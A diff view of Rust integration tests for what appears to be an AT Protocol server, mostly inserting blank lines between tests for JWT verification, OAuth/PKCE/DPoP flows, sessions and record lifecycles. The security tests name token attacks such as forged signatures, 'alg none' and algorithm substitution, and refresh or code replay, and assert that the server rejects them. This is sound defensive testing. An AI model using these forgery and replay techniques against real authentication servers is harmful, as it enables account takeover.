#[test]
413
438
fn test_jwt_security_header_injection_attack() {
414
439
let key_bytes = generate_user_key();
···
432
457
let result = verify_access_token(&token, &key_bytes);
433
458
assert!(result.is_ok(), "Extra header fields should not cause issues (we ignore them)");
434
459
}
460
+
435
461
#[test]
436
462
fn test_jwt_security_claims_type_confusion() {
437
463
let key_bytes = generate_user_key();
···
452
478
let result = verify_access_token(&token, &key_bytes);
453
479
assert!(result.is_err(), "Claims with wrong types must be rejected");
454
480
}
481
+
455
482
#[test]
456
483
fn test_jwt_security_unicode_injection_in_claims() {
457
484
let key_bytes = generate_user_key();
···
475
502
assert!(!data.claims.sub.contains('\0'), "Null bytes in claims should be sanitized or rejected");
476
503
}
477
504
}
505
+
478
506
#[test]
479
507
fn test_jwt_security_signature_verification_is_constant_time() {
480
508
let key_bytes = generate_user_key();
···
491
519
let _result2 = verify_access_token(&completely_invalid_token, &key_bytes);
492
520
assert!(true, "Signature verification should use constant-time comparison (timing attack prevention)");
493
521
}
522
+
494
523
#[test]
495
524
fn test_jwt_security_valid_scopes_accepted() {
496
525
let key_bytes = generate_user_key();
···
519
548
assert!(result.is_ok(), "Valid scope '{}' should be accepted", scope);
520
549
}
521
550
}
551
+
522
552
#[test]
523
553
fn test_jwt_security_refresh_token_scope_rejected_as_access() {
524
554
let key_bytes = generate_user_key();
···
540
570
let result = verify_access_token(&token, &key_bytes);
541
571
assert!(result.is_err(), "Refresh scope with access token type must be rejected");
542
572
}
573
+
543
574
#[test]
544
575
fn test_jwt_security_get_did_extraction_safe() {
545
576
let key_bytes = generate_user_key();
···
557
588
let extracted_unsafe = get_did_from_token(&unverified_token).expect("extract unsafe");
558
589
assert_eq!(extracted_unsafe, "did:plc:sub", "get_did_from_token extracts sub without verification (by design for lookup)");
559
590
}
591
+
560
592
#[test]
561
593
fn test_jwt_security_get_jti_extraction_safe() {
562
594
let key_bytes = generate_user_key();
···
572
604
let no_jti_token = format!("{}.{}.{}", header_b64, claims_b64, fake_sig);
573
605
assert!(get_jti_from_token(&no_jti_token).is_err(), "Missing jti should error");
574
606
}
607
+
575
608
#[test]
576
609
fn test_jwt_security_key_from_invalid_bytes_rejected() {
577
610
let invalid_keys: Vec<&[u8]> = vec![
···
591
624
}
592
625
}
593
626
}
627
+
594
628
#[test]
595
629
fn test_jwt_security_boundary_exp_values() {
596
630
let key_bytes = generate_user_key();
···
624
658
let result2 = verify_access_token(&token2, &key_bytes);
625
659
assert!(result2.is_err() || result2.is_ok(), "Token expiring exactly now is a boundary case - either behavior is acceptable");
626
660
}
661
+
627
662
#[test]
628
663
fn test_jwt_security_very_long_exp_handled() {
629
664
let key_bytes = generate_user_key();
···
644
679
let token = create_custom_jwt(&header, &claims, &key_bytes);
645
680
let _result = verify_access_token(&token, &key_bytes);
646
681
}
682
+
647
683
#[test]
648
684
fn test_jwt_security_negative_timestamps_handled() {
649
685
let key_bytes = generate_user_key();
···
664
700
let token = create_custom_jwt(&header, &claims, &key_bytes);
665
701
let _result = verify_access_token(&token, &key_bytes);
666
702
}
703
+
667
704
#[tokio::test]
668
705
async fn test_jwt_security_server_rejects_forged_session_token() {
669
706
let url = base_url().await;
···
679
716
.unwrap();
680
717
assert_eq!(res.status(), StatusCode::UNAUTHORIZED, "Forged session token must be rejected");
681
718
}
719
+
682
720
#[tokio::test]
683
721
async fn test_jwt_security_server_rejects_expired_token() {
684
722
let url = base_url().await;
···
698
736
.unwrap();
699
737
assert_eq!(res.status(), StatusCode::UNAUTHORIZED, "Tampered/expired token must be rejected");
700
738
}
739
+
701
740
#[tokio::test]
702
741
async fn test_jwt_security_server_rejects_tampered_did() {
703
742
let url = base_url().await;
···
718
757
.unwrap();
719
758
assert_eq!(res.status(), StatusCode::UNAUTHORIZED, "DID-tampered token must be rejected");
720
759
}
760
+
721
761
#[tokio::test]
722
762
async fn test_jwt_security_refresh_token_replay_protection() {
723
763
let url = base_url().await;
···
780
820
.unwrap();
781
821
assert_eq!(replay_res.status(), StatusCode::UNAUTHORIZED, "Refresh token replay must be rejected");
782
822
}
823
+
783
824
#[tokio::test]
784
825
async fn test_jwt_security_authorization_header_formats() {
785
826
let url = base_url().await;
···
821
862
.unwrap();
822
863
assert_eq!(empty_token_res.status(), StatusCode::UNAUTHORIZED, "Empty token must be rejected");
823
864
}
865
+
824
866
#[tokio::test]
825
867
async fn test_jwt_security_deleted_session_rejected() {
826
868
let url = base_url().await;
···
848
890
.unwrap();
849
891
assert_eq!(after_logout_res.status(), StatusCode::UNAUTHORIZED, "Token must be rejected after logout");
850
892
}
893
+
851
894
#[tokio::test]
852
895
async fn test_jwt_security_deactivated_account_rejected() {
853
896
let url = base_url().await;
+23
tests/lifecycle_record.rs
+23
tests/lifecycle_record.rs
···
6
6
use reqwest::{StatusCode, header};
7
7
use serde_json::{Value, json};
8
8
use std::time::Duration;
9
+
9
10
#[tokio::test]
10
11
async fn test_post_crud_lifecycle() {
11
12
let client = client();
···
155
156
"Record was found, but it should be deleted"
156
157
);
157
158
}
159
+
158
160
#[tokio::test]
159
161
async fn test_record_update_conflict_lifecycle() {
160
162
let client = client();
···
280
282
"v3 (good) update failed"
281
283
);
282
284
}
285
+
283
286
#[tokio::test]
284
287
async fn test_profile_lifecycle() {
285
288
let client = client();
···
362
365
let updated_body: Value = get_updated_res.json().await.unwrap();
363
366
assert_eq!(updated_body["value"]["displayName"], "Updated User");
364
367
}
368
+
365
369
#[tokio::test]
366
370
async fn test_reply_thread_lifecycle() {
367
371
let client = client();
···
457
461
.expect("Failed to create nested reply");
458
462
assert_eq!(nested_res.status(), StatusCode::OK, "Failed to create nested reply");
459
463
}
464
+
460
465
#[tokio::test]
461
466
async fn test_blob_in_record_lifecycle() {
462
467
let client = client();
···
514
519
let profile: Value = get_res.json().await.unwrap();
515
520
assert!(profile["value"]["avatar"]["ref"]["$link"].is_string());
516
521
}
522
+
517
523
#[tokio::test]
518
524
async fn test_authorization_cannot_modify_other_repo() {
519
525
let client = client();
···
545
551
res.status()
546
552
);
547
553
}
554
+
548
555
#[tokio::test]
549
556
async fn test_authorization_cannot_delete_other_record() {
550
557
let client = client();
···
587
594
.expect("Failed to verify record exists");
588
595
assert_eq!(get_res.status(), StatusCode::OK, "Record should still exist");
589
596
}
597
+
590
598
#[tokio::test]
591
599
async fn test_apply_writes_batch_lifecycle() {
592
600
let client = client();
···
747
755
"Batch-deleted post should be gone"
748
756
);
749
757
}
758
+
750
759
async fn create_post_with_rkey(
751
760
client: &reqwest::Client,
752
761
did: &str,
···
781
790
body["cid"].as_str().unwrap().to_string(),
782
791
)
783
792
}
793
+
784
794
#[tokio::test]
785
795
async fn test_list_records_default_order() {
786
796
let client = client();
···
812
822
.collect();
813
823
assert_eq!(rkeys, vec!["cccc", "bbbb", "aaaa"], "Default order should be DESC (newest first)");
814
824
}
825
+
815
826
#[tokio::test]
816
827
async fn test_list_records_reverse_true() {
817
828
let client = client();
···
843
854
.collect();
844
855
assert_eq!(rkeys, vec!["aaaa", "bbbb", "cccc"], "reverse=true should give ASC order (oldest first)");
845
856
}
857
+
846
858
#[tokio::test]
847
859
async fn test_list_records_cursor_pagination() {
848
860
let client = client();
···
895
907
let unique_uris: std::collections::HashSet<&str> = all_uris.iter().copied().collect();
896
908
assert_eq!(all_uris.len(), unique_uris.len(), "Cursor pagination should not repeat records");
897
909
}
910
+
898
911
#[tokio::test]
899
912
async fn test_list_records_rkey_start() {
900
913
let client = client();
···
928
941
assert!(*rkey >= "bbbb", "rkeyStart should filter records >= start");
929
942
}
930
943
}
944
+
931
945
#[tokio::test]
932
946
async fn test_list_records_rkey_end() {
933
947
let client = client();
···
961
975
assert!(*rkey <= "cccc", "rkeyEnd should filter records <= end");
962
976
}
963
977
}
978
+
964
979
#[tokio::test]
965
980
async fn test_list_records_rkey_range() {
966
981
let client = client();
···
997
1012
}
998
1013
assert!(!rkeys.is_empty(), "Should have at least some records in range");
999
1014
}
1015
+
1000
1016
#[tokio::test]
1001
1017
async fn test_list_records_limit_clamping_max() {
1002
1018
let client = client();
···
1022
1038
let records = body["records"].as_array().unwrap();
1023
1039
assert!(records.len() <= 100, "Limit should be clamped to max 100");
1024
1040
}
1041
+
1025
1042
#[tokio::test]
1026
1043
async fn test_list_records_limit_clamping_min() {
1027
1044
let client = client();
···
1045
1062
let records = body["records"].as_array().unwrap();
1046
1063
assert!(records.len() >= 1, "Limit should be clamped to min 1");
1047
1064
}
1065
+
1048
1066
#[tokio::test]
1049
1067
async fn test_list_records_empty_collection() {
1050
1068
let client = client();
···
1067
1085
assert!(records.is_empty(), "Empty collection should return empty array");
1068
1086
assert!(body["cursor"].is_null(), "Empty collection should have no cursor");
1069
1087
}
1088
+
1070
1089
#[tokio::test]
1071
1090
async fn test_list_records_exact_limit() {
1072
1091
let client = client();
···
1092
1111
let records = body["records"].as_array().unwrap();
1093
1112
assert_eq!(records.len(), 5, "Should return exactly 5 records when limit=5");
1094
1113
}
1114
+
1095
1115
#[tokio::test]
1096
1116
async fn test_list_records_cursor_exhaustion() {
1097
1117
let client = client();
···
1117
1137
let records = body["records"].as_array().unwrap();
1118
1138
assert_eq!(records.len(), 3);
1119
1139
}
1140
+
1120
1141
#[tokio::test]
1121
1142
async fn test_list_records_repo_not_found() {
1122
1143
let client = client();
···
1134
1155
.expect("Failed to list records");
1135
1156
assert_eq!(res.status(), StatusCode::NOT_FOUND);
1136
1157
}
1158
+
1137
1159
#[tokio::test]
1138
1160
async fn test_list_records_includes_cid() {
1139
1161
let client = client();
···
1162
1184
assert!(cid.starts_with("bafy"), "CID should be valid");
1163
1185
}
1164
1186
}
1187
+
1165
1188
#[tokio::test]
1166
1189
async fn test_list_records_cursor_with_reverse() {
1167
1190
let client = client();
+7
tests/lifecycle_session.rs
+7
tests/lifecycle_session.rs
···
5
5
use chrono::Utc;
6
6
use reqwest::StatusCode;
7
7
use serde_json::{Value, json};
8
+
8
9
#[tokio::test]
9
10
async fn test_session_lifecycle_wrong_password() {
10
11
let client = client();
···
28
29
res.status()
29
30
);
30
31
}
32
+
31
33
#[tokio::test]
32
34
async fn test_session_lifecycle_multiple_sessions() {
33
35
let client = client();
···
103
105
.expect("Failed getSession 2");
104
106
assert_eq!(get2.status(), StatusCode::OK);
105
107
}
108
+
106
109
#[tokio::test]
107
110
async fn test_session_lifecycle_refresh_invalidates_old() {
108
111
let client = client();
···
169
172
"Old refresh token should be invalid after use"
170
173
);
171
174
}
175
+
172
176
#[tokio::test]
173
177
async fn test_app_password_lifecycle() {
174
178
let client = client();
···
275
279
let passwords_after = list_after["passwords"].as_array().unwrap();
276
280
assert_eq!(passwords_after.len(), 0, "No app passwords should remain");
277
281
}
282
+
278
283
#[tokio::test]
279
284
async fn test_account_deactivation_lifecycle() {
280
285
let client = client();
···
362
367
let (new_post_uri, _) = create_post(&client, &did, &jwt, "Post after reactivation").await;
363
368
assert!(!new_post_uri.is_empty(), "Should be able to post after reactivation");
364
369
}
370
+
365
371
#[tokio::test]
366
372
async fn test_service_auth_lifecycle() {
367
373
let client = client();
···
393
399
assert_eq!(claims["aud"], "did:web:api.bsky.app");
394
400
assert_eq!(claims["lxm"], "com.atproto.repo.uploadBlob");
395
401
}
402
+
396
403
#[tokio::test]
397
404
async fn test_request_account_delete() {
398
405
let client = client();
+1
tests/moderation.rs
+1
tests/moderation.rs
+4
tests/notifications.rs
+4
tests/notifications.rs
···
4
4
NotificationStatus, NotificationType,
5
5
};
6
6
use sqlx::PgPool;
7
+
7
8
async fn get_pool() -> PgPool {
8
9
let conn_str = common::get_db_connection_string().await;
9
10
sqlx::postgres::PgPoolOptions::new()
···
12
13
.await
13
14
.expect("Failed to connect to test database")
14
15
}
16
+
15
17
#[tokio::test]
16
18
async fn test_enqueue_notification() {
17
19
let pool = get_pool().await;
···
53
55
assert_eq!(row.notification_type, NotificationType::Welcome);
54
56
assert_eq!(row.status, NotificationStatus::Pending);
55
57
}
58
+
56
59
#[tokio::test]
57
60
async fn test_enqueue_welcome() {
58
61
let pool = get_pool().await;
···
82
85
assert!(row.body.contains(&format!("@{}", user_row.handle)));
83
86
assert_eq!(row.notification_type, NotificationType::Welcome);
84
87
}
88
+
85
89
#[tokio::test]
86
90
async fn test_notification_queue_status_index() {
87
91
let pool = get_pool().await;
+3
tests/oauth.rs
+3
tests/oauth.rs
···
8
8
use sha2::{Digest, Sha256};
9
9
use wiremock::{Mock, MockServer, ResponseTemplate};
10
10
use wiremock::matchers::{method, path};
11
+
11
12
fn no_redirect_client() -> reqwest::Client {
12
13
reqwest::Client::builder()
13
14
.redirect(redirect::Policy::none())
14
15
.build()
15
16
.unwrap()
16
17
}
18
+
17
19
fn generate_pkce() -> (String, String) {
18
20
let verifier_bytes: [u8; 32] = rand::random();
19
21
let code_verifier = URL_SAFE_NO_PAD.encode(verifier_bytes);
···
23
25
let code_challenge = URL_SAFE_NO_PAD.encode(&hash);
24
26
(code_verifier, code_challenge)
25
27
}
28
+
26
29
async fn setup_mock_client_metadata(redirect_uri: &str) -> MockServer {
27
30
let mock_server = MockServer::start().await;
28
31
let client_id = mock_server.uri();
+18
tests/oauth_lifecycle.rs
+18
tests/oauth_lifecycle.rs
···
1
1
mod common;
2
2
mod helpers;
3
+
3
4
use base64::{Engine as _, engine::general_purpose::URL_SAFE_NO_PAD};
4
5
use chrono::Utc;
5
6
use common::{base_url, client};
···
9
10
use sha2::{Digest, Sha256};
10
11
use wiremock::{Mock, MockServer, ResponseTemplate};
11
12
use wiremock::matchers::{method, path};
13
+
12
14
fn generate_pkce() -> (String, String) {
13
15
let verifier_bytes: [u8; 32] = rand::random();
14
16
let code_verifier = URL_SAFE_NO_PAD.encode(verifier_bytes);
···
18
20
let code_challenge = URL_SAFE_NO_PAD.encode(&hash);
19
21
(code_verifier, code_challenge)
20
22
}
23
+
21
24
fn no_redirect_client() -> reqwest::Client {
22
25
reqwest::Client::builder()
23
26
.redirect(redirect::Policy::none())
24
27
.build()
25
28
.unwrap()
26
29
}
30
+
27
31
async fn setup_mock_client_metadata(redirect_uri: &str) -> MockServer {
28
32
let mock_server = MockServer::start().await;
29
33
let client_id = mock_server.uri();
···
43
47
.await;
44
48
mock_server
45
49
}
50
+
46
51
struct OAuthSession {
47
52
access_token: String,
48
53
refresh_token: String,
49
54
did: String,
50
55
client_id: String,
51
56
}
57
+
52
58
async fn create_user_and_oauth_session(handle_prefix: &str, redirect_uri: &str) -> (OAuthSession, MockServer) {
53
59
let url = base_url().await;
54
60
let http_client = client();
···
125
131
};
126
132
(session, mock_client)
127
133
}
134
+
128
135
#[tokio::test]
129
136
async fn test_oauth_token_can_create_and_read_records() {
130
137
let url = base_url().await;
···
169
176
let get_body: Value = get_res.json().await.unwrap();
170
177
assert_eq!(get_body["value"]["text"], post_text);
171
178
}
179
+
172
180
#[tokio::test]
173
181
async fn test_oauth_token_can_upload_blob() {
174
182
let url = base_url().await;
···
191
199
assert!(upload_body["blob"]["ref"]["$link"].is_string());
192
200
assert_eq!(upload_body["blob"]["mimeType"], "text/plain");
193
201
}
202
+
194
203
#[tokio::test]
195
204
async fn test_oauth_token_can_describe_repo() {
196
205
let url = base_url().await;
···
211
220
assert_eq!(describe_body["did"], session.did);
212
221
assert!(describe_body["handle"].is_string());
213
222
}
223
+
214
224
#[tokio::test]
215
225
async fn test_oauth_full_post_lifecycle_create_edit_delete() {
216
226
let url = base_url().await;
···
300
310
get_deleted_res.status()
301
311
);
302
312
}
313
+
303
314
#[tokio::test]
304
315
async fn test_oauth_batch_operations_apply_writes() {
305
316
let url = base_url().await;
···
367
378
let records = list_body["records"].as_array().unwrap();
368
379
assert!(records.len() >= 3, "Should have at least 3 records from batch");
369
380
}
381
+
370
382
#[tokio::test]
371
383
async fn test_oauth_token_refresh_maintains_access() {
372
384
let url = base_url().await;
···
437
449
let records = list_body["records"].as_array().unwrap();
438
450
assert_eq!(records.len(), 2, "Should have both posts");
439
451
}
452
+
440
453
#[tokio::test]
441
454
async fn test_oauth_revoked_token_cannot_access_resources() {
442
455
let url = base_url().await;
···
481
494
.unwrap();
482
495
assert_eq!(refresh_res.status(), StatusCode::BAD_REQUEST, "Revoked refresh token should not work");
483
496
}
497
+
484
498
#[tokio::test]
485
499
async fn test_oauth_multiple_clients_same_user() {
486
500
let url = base_url().await;
···
640
654
let records = list_body["records"].as_array().unwrap();
641
655
assert_eq!(records.len(), 2, "Both posts should be visible to either client");
642
656
}
657
+
643
658
#[tokio::test]
644
659
async fn test_oauth_social_interactions_follow_like_repost() {
645
660
let url = base_url().await;
···
757
772
let likes = likes_body["records"].as_array().unwrap();
758
773
assert_eq!(likes.len(), 1, "Bob should have 1 like");
759
774
}
775
+
760
776
#[tokio::test]
761
777
async fn test_oauth_cannot_modify_other_users_repo() {
762
778
let url = base_url().await;
···
804
820
let posts = posts_body["records"].as_array().unwrap();
805
821
assert_eq!(posts.len(), 0, "Alice's repo should have no posts from Bob");
806
822
}
823
+
807
824
#[tokio::test]
808
825
async fn test_oauth_session_isolation_between_users() {
809
826
let url = base_url().await;
···
878
895
assert_eq!(bob_posts.len(), 1);
879
896
assert_eq!(bob_posts[0]["value"]["text"], "Bob's different thoughts");
880
897
}
898
+
881
899
#[tokio::test]
882
900
async fn test_oauth_token_works_with_sync_endpoints() {
883
901
let url = base_url().await;
+56
tests/oauth_security.rs
+56
tests/oauth_security.rs
···
12
12
use sha2::{Digest, Sha256};
13
13
use wiremock::{Mock, MockServer, ResponseTemplate};
14
14
use wiremock::matchers::{method, path};
15
+
15
16
fn no_redirect_client() -> reqwest::Client {
16
17
reqwest::Client::builder()
17
18
.redirect(redirect::Policy::none())
18
19
.build()
19
20
.unwrap()
20
21
}
22
+
21
23
fn generate_pkce() -> (String, String) {
22
24
let verifier_bytes: [u8; 32] = rand::random();
23
25
let code_verifier = URL_SAFE_NO_PAD.encode(verifier_bytes);
···
27
29
let code_challenge = URL_SAFE_NO_PAD.encode(&hash);
28
30
(code_verifier, code_challenge)
29
31
}
32
+
30
33
async fn setup_mock_client_metadata(redirect_uri: &str) -> MockServer {
31
34
let mock_server = MockServer::start().await;
32
35
let client_id = mock_server.uri();
···
46
49
.await;
47
50
mock_server
48
51
}
52
+
49
53
async fn get_oauth_tokens(
50
54
http_client: &reqwest::Client,
51
55
url: &str,
···
117
121
let refresh_token = token_body["refresh_token"].as_str().unwrap().to_string();
118
122
(access_token, refresh_token, client_id)
119
123
}
124
+
120
125
#[tokio::test]
121
126
async fn test_security_forged_token_signature_rejected() {
122
127
let url = base_url().await;
···
134
139
.unwrap();
135
140
assert_eq!(res.status(), StatusCode::UNAUTHORIZED, "Forged signature should be rejected");
136
141
}
142
+
137
143
#[tokio::test]
138
144
async fn test_security_modified_payload_rejected() {
139
145
let url = base_url().await;
···
153
159
.unwrap();
154
160
assert_eq!(res.status(), StatusCode::UNAUTHORIZED, "Modified payload should be rejected");
155
161
}
162
+
156
163
#[tokio::test]
157
164
async fn test_security_algorithm_none_attack_rejected() {
158
165
let url = base_url().await;
···
181
188
.unwrap();
182
189
assert_eq!(res.status(), StatusCode::UNAUTHORIZED, "Algorithm 'none' attack should be rejected");
183
190
}
191
+
184
192
#[tokio::test]
185
193
async fn test_security_algorithm_substitution_attack_rejected() {
186
194
let url = base_url().await;
···
209
217
.unwrap();
210
218
assert_eq!(res.status(), StatusCode::UNAUTHORIZED, "Algorithm substitution attack should be rejected");
211
219
}
220
+
212
221
#[tokio::test]
213
222
async fn test_security_expired_token_rejected() {
214
223
let url = base_url().await;
···
237
246
.unwrap();
238
247
assert_eq!(res.status(), StatusCode::UNAUTHORIZED, "Expired token should be rejected");
239
248
}
249
+
240
250
#[tokio::test]
241
251
async fn test_security_pkce_plain_method_rejected() {
242
252
let url = base_url().await;
···
264
274
"Error should mention S256 requirement"
265
275
);
266
276
}
277
+
267
278
#[tokio::test]
268
279
async fn test_security_pkce_missing_challenge_rejected() {
269
280
let url = base_url().await;
···
283
294
.unwrap();
284
295
assert_eq!(res.status(), StatusCode::BAD_REQUEST, "Missing PKCE challenge should be rejected");
285
296
}
297
+
286
298
#[tokio::test]
287
299
async fn test_security_pkce_wrong_verifier_rejected() {
288
300
let url = base_url().await;
···
352
364
let body: Value = token_res.json().await.unwrap();
353
365
assert_eq!(body["error"], "invalid_grant");
354
366
}
367
+
355
368
#[tokio::test]
356
369
async fn test_security_authorization_code_replay_attack() {
357
370
let url = base_url().await;
···
434
447
let body: Value = replay_res.json().await.unwrap();
435
448
assert_eq!(body["error"], "invalid_grant");
436
449
}
450
+
437
451
#[tokio::test]
438
452
async fn test_security_refresh_token_replay_attack() {
439
453
let url = base_url().await;
···
550
564
"Token family should be revoked after replay detection"
551
565
);
552
566
}
567
+
553
568
#[tokio::test]
554
569
async fn test_security_redirect_uri_manipulation() {
555
570
let url = base_url().await;
···
573
588
.unwrap();
574
589
assert_eq!(res.status(), StatusCode::BAD_REQUEST, "Unregistered redirect_uri should be rejected");
575
590
}
591
+
576
592
#[tokio::test]
577
593
async fn test_security_deactivated_account_blocked() {
578
594
let url = base_url().await;
···
639
655
let body: Value = auth_res.json().await.unwrap();
640
656
assert_eq!(body["error"], "access_denied");
641
657
}
658
+
642
659
#[tokio::test]
643
660
async fn test_security_url_injection_in_state_parameter() {
644
661
let url = base_url().await;
···
710
727
location
711
728
);
712
729
}
730
+
713
731
#[tokio::test]
714
732
async fn test_security_cross_client_token_theft() {
715
733
let url = base_url().await;
···
789
807
"Error should mention client_id mismatch"
790
808
);
791
809
}
810
+
792
811
#[test]
793
812
fn test_security_dpop_nonce_tamper_detection() {
794
813
let secret = b"test-dpop-secret-32-bytes-long!!";
···
803
822
let result = verifier.validate_nonce(&tampered_nonce);
804
823
assert!(result.is_err(), "Tampered nonce should be rejected");
805
824
}
825
+
806
826
#[test]
807
827
fn test_security_dpop_nonce_cross_server_rejected() {
808
828
let secret1 = b"server-1-secret-32-bytes-long!!!";
···
813
833
let result = verifier2.validate_nonce(&nonce_from_server1);
814
834
assert!(result.is_err(), "Nonce from different server should be rejected");
815
835
}
836
+
816
837
#[test]
817
838
fn test_security_dpop_proof_signature_tampering() {
818
839
use p256::ecdsa::{SigningKey, Signature, signature::Signer};
···
851
872
let result = verifier.verify_proof(&tampered_proof, "POST", "https://example.com/token", None);
852
873
assert!(result.is_err(), "Tampered DPoP signature should be rejected");
853
874
}
875
+
854
876
#[test]
855
877
fn test_security_dpop_proof_key_substitution() {
856
878
use p256::ecdsa::{SigningKey, Signature, signature::Signer};
···
888
910
let result = verifier.verify_proof(&mismatched_proof, "POST", "https://example.com/token", None);
889
911
assert!(result.is_err(), "DPoP proof with mismatched key should be rejected");
890
912
}
913
+
891
914
#[test]
892
915
fn test_security_jwk_thumbprint_consistency() {
893
916
let jwk = DPoPJwk {
···
905
928
assert_eq!(first, result, "Thumbprint should be deterministic, but iteration {} differs", i);
906
929
}
907
930
}
931
+
908
932
#[test]
909
933
fn test_security_dpop_iat_clock_skew_limits() {
910
934
use p256::ecdsa::{SigningKey, Signature, signature::Signer};
···
956
980
}
957
981
}
958
982
}
983
+
959
984
#[test]
960
985
fn test_security_dpop_method_case_insensitivity() {
961
986
use p256::ecdsa::{SigningKey, Signature, signature::Signer};
···
992
1017
let result = verifier.verify_proof(&proof, "POST", "https://example.com/token", None);
993
1018
assert!(result.is_ok(), "HTTP method comparison should be case-insensitive");
994
1019
}
1020
+
995
1021
#[tokio::test]
996
1022
async fn test_security_invalid_grant_type_rejected() {
997
1023
let url = base_url().await;
···
1024
1050
);
1025
1051
}
1026
1052
}
1053
+
1027
1054
#[tokio::test]
1028
1055
async fn test_security_token_with_wrong_typ_rejected() {
1029
1056
let url = base_url().await;
···
1066
1093
);
1067
1094
}
1068
1095
}
1096
+
1069
1097
#[tokio::test]
1070
1098
async fn test_security_missing_required_claims_rejected() {
1071
1099
let url = base_url().await;
···
1098
1126
);
1099
1127
}
1100
1128
}
1129
+
1101
1130
#[tokio::test]
1102
1131
async fn test_security_malformed_tokens_rejected() {
1103
1132
let url = base_url().await;
···
1130
1159
);
1131
1160
}
1132
1161
}
1162
+
1133
1163
#[tokio::test]
1134
1164
async fn test_security_authorization_header_formats() {
1135
1165
let url = base_url().await;
···
1175
1205
);
1176
1206
}
1177
1207
}
1208
+
1178
1209
#[tokio::test]
1179
1210
async fn test_security_no_authorization_header() {
1180
1211
let url = base_url().await;
···
1186
1217
.unwrap();
1187
1218
assert_eq!(res.status(), StatusCode::UNAUTHORIZED, "Missing auth header should return 401");
1188
1219
}
1220
+
1189
1221
#[tokio::test]
1190
1222
async fn test_security_empty_authorization_header() {
1191
1223
let url = base_url().await;
···
1198
1230
.unwrap();
1199
1231
assert_eq!(res.status(), StatusCode::UNAUTHORIZED, "Empty auth header should return 401");
1200
1232
}
1233
+
1201
1234
#[tokio::test]
1202
1235
async fn test_security_revoked_token_rejected() {
1203
1236
let url = base_url().await;
···
1219
1252
let introspect_body: Value = introspect_res.json().await.unwrap();
1220
1253
assert_eq!(introspect_body["active"], false, "Revoked token should be inactive");
1221
1254
}
1255
+
1222
1256
#[tokio::test]
1223
1257
#[ignore = "rate limiting is disabled in test environment"]
1224
1258
async fn test_security_oauth_authorize_rate_limiting() {
···
1274
1308
rate_limited_count
1275
1309
);
1276
1310
}
1311
+
1277
1312
fn create_dpop_proof(
1278
1313
method: &str,
1279
1314
uri: &str,
···
1317
1352
let signature_b64 = URL_SAFE_NO_PAD.encode(signature.to_bytes());
1318
1353
format!("{}.{}", signing_input, signature_b64)
1319
1354
}
1355
+
1320
1356
#[test]
1321
1357
fn test_dpop_nonce_generation() {
1322
1358
let secret = b"test-dpop-secret-32-bytes-long!!";
···
1326
1362
assert!(!nonce1.is_empty());
1327
1363
assert!(!nonce2.is_empty());
1328
1364
}
1365
+
1329
1366
#[test]
1330
1367
fn test_dpop_nonce_validation_success() {
1331
1368
let secret = b"test-dpop-secret-32-bytes-long!!";
···
1334
1371
let result = verifier.validate_nonce(&nonce);
1335
1372
assert!(result.is_ok(), "Valid nonce should pass: {:?}", result);
1336
1373
}
1374
+
1337
1375
#[test]
1338
1376
fn test_dpop_nonce_wrong_secret() {
1339
1377
let secret1 = b"test-dpop-secret-32-bytes-long!!";
···
1344
1382
let result = verifier2.validate_nonce(&nonce);
1345
1383
assert!(result.is_err(), "Nonce from different secret should fail");
1346
1384
}
1385
+
1347
1386
#[test]
1348
1387
fn test_dpop_nonce_invalid_format() {
1349
1388
let secret = b"test-dpop-secret-32-bytes-long!!";
···
1352
1391
assert!(verifier.validate_nonce("").is_err());
1353
1392
assert!(verifier.validate_nonce("!!!not-base64!!!").is_err());
1354
1393
}
1394
+
1355
1395
#[test]
1356
1396
fn test_jwk_thumbprint_ec_p256() {
1357
1397
let jwk = DPoPJwk {
···
1366
1406
assert!(!tp.is_empty());
1367
1407
assert!(tp.chars().all(|c| c.is_alphanumeric() || c == '-' || c == '_'));
1368
1408
}
1409
+
1369
1410
#[test]
1370
1411
fn test_jwk_thumbprint_ec_secp256k1() {
1371
1412
let jwk = DPoPJwk {
···
1377
1418
let thumbprint = compute_jwk_thumbprint(&jwk);
1378
1419
assert!(thumbprint.is_ok());
1379
1420
}
1421
+
1380
1422
#[test]
1381
1423
fn test_jwk_thumbprint_okp_ed25519() {
1382
1424
let jwk = DPoPJwk {
···
1388
1430
let thumbprint = compute_jwk_thumbprint(&jwk);
1389
1431
assert!(thumbprint.is_ok());
1390
1432
}
1433
+
1391
1434
#[test]
1392
1435
fn test_jwk_thumbprint_missing_crv() {
1393
1436
let jwk = DPoPJwk {
···
1399
1442
let thumbprint = compute_jwk_thumbprint(&jwk);
1400
1443
assert!(thumbprint.is_err());
1401
1444
}
1445
+
1402
1446
#[test]
1403
1447
fn test_jwk_thumbprint_missing_x() {
1404
1448
let jwk = DPoPJwk {
···
1410
1454
let thumbprint = compute_jwk_thumbprint(&jwk);
1411
1455
assert!(thumbprint.is_err());
1412
1456
}
1457
+
1413
1458
#[test]
1414
1459
fn test_jwk_thumbprint_missing_y_for_ec() {
1415
1460
let jwk = DPoPJwk {
···
1421
1466
let thumbprint = compute_jwk_thumbprint(&jwk);
1422
1467
assert!(thumbprint.is_err());
1423
1468
}
1469
+
1424
1470
#[test]
1425
1471
fn test_jwk_thumbprint_unsupported_key_type() {
1426
1472
let jwk = DPoPJwk {
···
1432
1478
let thumbprint = compute_jwk_thumbprint(&jwk);
1433
1479
assert!(thumbprint.is_err());
1434
1480
}
1481
+
1435
1482
#[test]
1436
1483
fn test_jwk_thumbprint_deterministic() {
1437
1484
let jwk = DPoPJwk {
···
1444
1491
let tp2 = compute_jwk_thumbprint(&jwk).unwrap();
1445
1492
assert_eq!(tp1, tp2, "Thumbprint should be deterministic");
1446
1493
}
1494
+
1447
1495
#[test]
1448
1496
fn test_dpop_proof_invalid_format() {
1449
1497
let secret = b"test-dpop-secret-32-bytes-long!!";
···
1453
1501
let result = verifier.verify_proof("invalid", "POST", "https://example.com", None);
1454
1502
assert!(result.is_err());
1455
1503
}
1504
+
1456
1505
#[test]
1457
1506
fn test_dpop_proof_invalid_typ() {
1458
1507
let secret = b"test-dpop-secret-32-bytes-long!!";
···
1479
1528
let result = verifier.verify_proof(&proof, "POST", "https://example.com", None);
1480
1529
assert!(result.is_err());
1481
1530
}
1531
+
1482
1532
#[test]
1483
1533
fn test_dpop_proof_method_mismatch() {
1484
1534
let secret = b"test-dpop-secret-32-bytes-long!!";
···
1487
1537
let result = verifier.verify_proof(&proof, "GET", "https://example.com/token", None);
1488
1538
assert!(result.is_err());
1489
1539
}
1540
+
1490
1541
#[test]
1491
1542
fn test_dpop_proof_uri_mismatch() {
1492
1543
let secret = b"test-dpop-secret-32-bytes-long!!";
···
1495
1546
